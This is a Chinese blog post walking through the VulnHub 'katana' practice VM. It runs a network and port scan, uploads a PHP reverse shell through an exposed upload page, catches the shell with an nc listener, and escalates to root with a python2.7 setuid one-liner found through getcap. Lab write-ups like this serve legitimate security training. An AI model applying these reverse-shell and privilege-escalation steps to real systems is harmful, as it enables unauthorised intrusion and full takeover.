vulnhub之katana的实践

admin 2023年7月24日11:58:00评论8 views字数 768阅读2分33秒阅读模式

今天实践的是vulnhub的katana镜像,

下载地址,https://download.vulnhub.com/katana/katana.zip,

用workstation导入成功,

做地址扫描,sudo netdiscover -r 192.168.177.0/24,

获取到靶机地址192.168.177.148,

vulnhub之katana的实践

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.148,

vulnhub之katana的实践

8088端口有web服务,做html路径扫描,

dirb http://192.168.177.148:8088/ -X .html,

vulnhub之katana的实践

获取到http://192.168.177.148:8088/upload.html,浏览器访问,

vulnhub之katana的实践

在kali攻击机上准备php-reverse-shell.php文件,上传,

vulnhub之katana的实践

kali攻击机上准备好反弹shell监听,nc -lvp 4444,

浏览器访问http://192.168.177.148:8715/katana_php-reverse-shell.php,获取到了反弹shell,

不是root,需要提权,

搜索设置了capabilities的可执行文件,getcap -r / 2>/dev/null,

用python2.7进行提权,

/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")',

id确认是root,

vulnhub之katana的实践

本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束,本周的技术实践到此结束。

原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之katana的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月24日11:58:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之katana的实践http://cn-sec.com/archives/1900676.html

发表评论

匿名网友 填写信息